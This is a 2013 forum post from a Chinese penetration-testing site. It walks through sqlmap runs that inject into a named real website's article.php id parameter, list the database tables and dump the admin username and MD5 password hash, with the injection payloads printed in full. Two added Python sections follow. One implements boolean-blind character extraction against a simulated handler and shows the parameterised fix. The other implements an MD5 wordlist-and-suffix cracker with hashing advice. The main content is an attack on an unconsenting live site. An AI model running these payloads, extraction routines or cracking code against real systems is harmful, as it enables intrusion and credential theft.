中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: sqlmap worked example: injecting MySQL

Author: admin    Time: 2013-4-4 22:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: fetch the current user name */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost"         /* list the tables in the current database */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0     /* get the column names of the admin table */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0      /* dump the contents of those columns */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
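None of the five runs above shows request traffic, because each one resumed from the session file (hence "0 HTTP(s) requests"). The cheapest oracle sqlmap reported is the boolean-based blind payload `id=276 AND 799=799`, and it is worth seeing how a whole `--dump` is driven from nothing but that true/false signal. The Python below is an added example, not code from the post or from sqlmap: it models `article.php` as a handler over an in-memory SQLite copy of the `article` and `admin` tables (constructed sample rows, not the site's data; the stored value is MD5 of the string "password"), reproduces sqlmap's tautology/contradiction confirmation, extracts the `password` column one character at a time by binary search over `unicode(substr(...))` (SQLite's spelling of MySQL's `ASCII(SUBSTRING(...))`), and shows the same extraction failing against a parameterised version of the handler.

```python
import sqlite3
from typing import Callable, Tuple

# Constructed stand-in for the two tables the post enumerates. Sample rows only, not the
# site's data; the stored value is MD5("password"), chosen so the result is recognisable.
SCHEMA = """
CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE admin (id INTEGER PRIMARY KEY, userid TEXT, password TEXT, type TEXT);
INSERT INTO article VALUES (276, 'Sample article');
INSERT INTO admin VALUES (1, 'wepost2010', '5f4dcc3b5aa765d61d8327deb882cf99', 'admin');
"""

Oracle = Callable[[str], bool]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_article(conn: sqlite3.Connection, id_param: str) -> bool:
    """Models article.php?id=... concatenating the raw parameter into SQL (the flaw sqlmap found).
    True when an article row comes back (page renders), False on no row or SQL error (empty
    page / 500): exactly the two states a boolean-based blind attack distinguishes."""
    sql = "SELECT title FROM article WHERE id=" + id_param
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def hardened_article(conn: sqlite3.Connection, id_param: str) -> bool:
    """Same handler with the fix: validate the type, then bind the value as a parameter."""
    try:
        article_id = int(id_param)
    except ValueError:
        return False
    row = conn.execute("SELECT title FROM article WHERE id=?", (article_id,)).fetchone()
    return row is not None


def confirm_injection(oracle: Oracle) -> Tuple[bool, bool]:
    """sqlmap's confirmation probe: a tautology and a contradiction must give different pages."""
    return oracle("276 AND 799=799"), oracle("276 AND 799=798")


def blind_extract(oracle: Oracle, column: str, table: str, max_len: int = 64) -> Tuple[str, int]:
    """Recover a string using only the true/false oracle, seven requests per character.
    SQLite: unicode(substr(x, pos, 1)); MySQL equivalent: ASCII(SUBSTRING(x, pos, 1))."""
    value, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                      # binary search over the 7-bit code point
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (f"276 AND unicode(substr((SELECT {column} FROM {table} LIMIT 1),"
                       f"{pos},1))>{mid}")
            requests += 1
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # substr() past the end is '' and unicode('') is NULL, so every probe was false:
            # end of string reached.
            break
        value += chr(lo)
    return value, requests


if __name__ == "__main__":
    db = make_db()
    vuln = lambda p: vulnerable_article(db, p)
    safe = lambda p: hardened_article(db, p)
    print("vulnerable confirm:", confirm_injection(vuln))   # (True, False)
    print("hardened confirm:  ", confirm_injection(safe))   # (False, False)
    print("dump via vulnerable:", blind_extract(vuln, "password", "admin"))
    print("dump via hardened:  ", blind_extract(safe, "password", "admin"))
```

Each character costs seven requests, so the 32-character hash plus the end-of-string probe is 231 requests; sqlmap pays the same price against the live site, which is why the session file matters and why an access log full of `AND ASCII(SUBSTRING(` probes with alternating page sizes is the pattern to hunt for on the defending side. The fix is the one in `hardened_article`: the id is cast to an integer and bound as a parameter, so `AND 799=799` never reaches the SQL parser. The `current user: 'root@localhost'` line earlier in the post is the second finding: the application connects as the database superuser, so an injection here is not just a data leak.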


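The last run prompts "recognized possible password hash values" because the dumped `password` column holds 32 hex characters, consistent with unsalted MD5 in a `varchar(32)`, and offers a wordlist attack with common suffixes. The Python below is an added example of that step, not sqlmap's own cracking code: it uses a constructed admin row (the hash is MD5 of "password123"; the `userid` reuses the post's `wepost2010` account name), a short constructed wordlist, and an assumed suffix list. sqlmap's real inputs are `txt/wordlist.txt` and a suffix list in its source. It additionally tries the account name and its alphabetic stem as candidates, a habit worth keeping when the login looks like `name + year`.

```python
import hashlib
import re
from typing import Iterator, List, Optional

# Constructed sample row standing in for a dumped admin record (not the real site's data):
# the hash is MD5("password123"), a deliberately weak password for the demo.
SAMPLE_ROW = {"userid": "wepost2010", "password": "482c811da5d5b4bc6d497ffa98491e38"}

# Constructed wordlist and assumed suffix list; sqlmap ships its own (txt/wordlist.txt and an
# internal suffix table). These are stand-ins so the example runs offline.
WORDLIST = ["letmein", "admin", "password", "wepost", "qwerty"]
SUFFIXES = ["", "1", "12", "123", "!", "2010", "2013"]

MD5_RE = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)


def looks_like_md5(value: str) -> bool:
    """sqlmap's 'recognized possible password hash values' check, reduced to the MD5 case:
    exactly 32 hex digits. (16 hex digits would instead suggest MySQL OLD_PASSWORD().)"""
    return bool(MD5_RE.match(value))


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def candidates(userid: str, wordlist: List[str], suffixes: List[str]) -> Iterator[str]:
    """Yield candidates in the order a suffix attack tries them: every base word unsuffixed
    first (suffix ""), then each base word with each suffix appended."""
    # The account name and its alphabetic stem are added because logins get reused as passwords.
    base_words = list(wordlist) + [userid, re.sub(r"\d+$", "", userid)]
    seen = set()
    for suffix in suffixes:
        for word in base_words:
            cand = word + suffix
            if cand not in seen:
                seen.add(cand)
                yield cand


def crack_md5(hash_hex: str, userid: str,
              wordlist: List[str] = WORDLIST, suffixes: List[str] = SUFFIXES) -> Optional[str]:
    """Return the plaintext whose MD5 matches hash_hex, or None if the wordlist is exhausted."""
    if not looks_like_md5(hash_hex):
        return None
    target = hash_hex.lower()
    for cand in candidates(userid, wordlist, suffixes):
        if md5_hex(cand) == target:
            return cand
    return None


def crack_row(row: dict) -> Optional[str]:
    return crack_md5(row["password"], row["userid"])


if __name__ == "__main__":
    print(crack_row(SAMPLE_ROW))   # password123
```

The suffix loop multiplies the wordlist by the number of suffixes, which is why sqlmap labels the option "(slow!)"; with a real wordlist of a few hundred thousand entries it is still only seconds of MD5 work. That is the defender's lesson from this column: an unsalted fast hash falls to a suffix attack or a GPU whether or not the password is in a public list, so the fix is a salted, deliberately slow hash (bcrypt, scrypt or Argon2), not a longer wordlist-resistant password policy.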


Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2